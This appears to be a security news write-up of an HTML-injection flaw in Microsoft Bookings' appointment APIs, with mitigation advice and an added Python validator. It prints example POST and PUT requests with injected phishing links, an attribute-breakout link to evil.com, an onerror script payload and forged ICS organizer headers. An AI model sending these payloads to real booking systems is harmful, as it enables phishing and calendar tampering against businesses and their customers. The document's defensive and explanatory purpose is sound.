Security researchers have uncovered a significant vulnerability in Microsoft Bookings, the scheduling tool integrated with Microsoft 365.
The flaw, discovered through technical analysis of the service’s appointment creation and update APIs, allows unauthorized modification of meeting details, posing risks such as phishing, calendar manipulation, and information leakage.
Technical Details and Vulnerability Overview
The vulnerability arises from inadequate input validation and sanitization in several key fields used by Microsoft Bookings.

When a user, either a legitimate customer or a malicious actor, creates or modifies a meeting, the following fields in the API are not sufficiently filtered:
- appointment.serviceNotes
- appointment.additionalNotes
- appointment.body.content
These fields accept arbitrary HTML, which is subsequently embedded in confirmation emails, Teams invitations, and attached ICS (calendar) files.

Example: Exploiting the Booking API
1. Appointment Creation (POST Request)
POST /BookingsService/api/V1/bookingBusinessesc2/EXAMPLETestseite@bookings.example.de/appointments?app=BookingsC2&n=11 HTTP/1.1
Host: outlook.office365.com
Content-Type: application/json
{
 "appointment": {
   "serviceNotes": "<b style='color:red'>Injected Note!</b>",
   "body": {
     "contentType": "html",
     "content": "<a href='https://phishing-site.com'>Join meeting here</a>"
   },
  ...
 }
}
This request will cause the injected HTML to appear in all meeting-related emails and invites.
2. Appointment Modification via Rescheduling (PUT Request)
PUT /BookingsService/api/V1/bookingBusinessesc2/EXAMPLETestseite@bookings.example.de/appointments/[AppointmentID]?app=BookingsC2&n=16 HTTP/1.1
Host: outlook.office365.com
Content-Type: application/json
{
 "appointment": {
   "serviceNotes": "<a href='https://malicious.com'>Click me!</a>",
   "joinWebUrl": "https://legit.com\"></a><a href=\"https://evil.com\" style=\"color:red;\">Malicious Link</a><!--",
   "body": {
     "contentType": "html",
     "content": "<img src='x' onerror='alert(1)'>"
   },
   ...
 }
}
This can result in confirmation emails and calendar invites embedding unauthorized or malicious content, with ICS files manipulated via custom headers like X-ALT-DESC and altered ORGANIZER fields:
X-ALT-DESC;FMTTYPE=text/html:<a href="https://phishing-site.com"><h1>Phishing here!</h1></a>
ORGANIZER;CN=Attacker:mailto:attacker@example.com
- Phishing Attacks: Malicious links can be presented as legitimate meeting links, easily tricking users.
- Calendar Tampering: Attackers can alter timings, extend durations, or add/remove attendees, disrupting business operations.
- Sensitive Data Exposure: Notes meant for staff only could be leaked to customers or third parties through repeated edits.
- Denial of Service: By booking extremely long meetings, attackers can exhaust staff calendars, blocking new appointments.
Microsoft has enacted mitigations, but organizations should:
- Scrutinize booking parameters for unexpected content
- Educate staff on phishing risks from calendar invites
- Monitor for unusual booking activity
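One way to implement the first of these checks, added here as an example that is not taken from the article or from Microsoft: a server-side validator for the three fields the article names (serviceNotes, additionalNotes, body.content) plus joinWebUrl, run against constructed copies of the article's two request bodies and a benign booking. The allow-listed join host and the function name are assumptions for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed, abbreviated copies of the article's two request bodies plus a benign one.
CREATE_PAYLOAD = {"appointment": {
    "serviceNotes": "<b style='color:red'>Injected Note!</b>",
    "body": {"contentType": "html",
             "content": "<a href='https://phishing-site.com'>Join meeting here</a>"}}}
RESCHEDULE_PAYLOAD = {"appointment": {
    "serviceNotes": "<a href='https://malicious.com'>Click me!</a>",
    "joinWebUrl": 'https://legit.com"></a><a href="https://evil.com" '
                  'style="color:red;">Malicious Link</a><!--',
    "body": {"contentType": "html", "content": "<img src='x' onerror='alert(1)'>"}}}
BENIGN_PAYLOAD = {"appointment": {
    "serviceNotes": "Please bring photo ID.",
    "joinWebUrl": "https://teams.microsoft.com/l/meetup-join/constructed-id",
    "body": {"contentType": "text", "content": "See you at 10:00."}}}

TAG_RE = re.compile(r"<[^>]*>")               # any HTML/XML-style tag
ATTR_BREAKOUT_CHARS = set('"\'<>')            # characters that can end an href attribute
ALLOWED_JOIN_HOSTS = {"teams.microsoft.com"}  # assumption: hypothetical allow-list


def validate_appointment(payload):
    """Return a list of findings for the appointment; an empty list means acceptable.

    Free-text notes and the body must be plain text, and joinWebUrl must be an
    https URL on an allow-listed host with no characters that could break out of
    the href attribute it is later rendered into (the article's PUT example).
    """
    appt = payload.get("appointment") or {}
    findings = []
    for field in ("serviceNotes", "additionalNotes"):
        value = appt.get(field)
        if isinstance(value, str) and TAG_RE.search(value):
            findings.append(f"{field}: HTML markup is not allowed in free-text notes")
    body = appt.get("body") or {}
    if str(body.get("contentType", "")).lower() == "html" or TAG_RE.search(body.get("content", "")):
        findings.append("body.content: only plain-text bodies are accepted")
    url = appt.get("joinWebUrl")
    if url is not None:
        if ATTR_BREAKOUT_CHARS & set(url):
            findings.append("joinWebUrl: contains quote or angle-bracket characters")
        else:
            parsed = urlparse(url)
            if parsed.scheme != "https" or parsed.hostname not in ALLOWED_JOIN_HOSTS:
                findings.append("joinWebUrl: must be https on an allow-listed host")
    return findings
```

Rejecting the request outright, rather than stripping tags and continuing, avoids the sanitizer-bypass class of bugs; whatever survives validation should still be HTML-escaped when rendered into email, Teams and ICS output.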
This vulnerability underscores the importance of robust server-side validation, especially in customer-facing scheduling tools.
Organizations relying on Microsoft Bookings should remain vigilant and keep systems up-to-date to protect against evolving threats.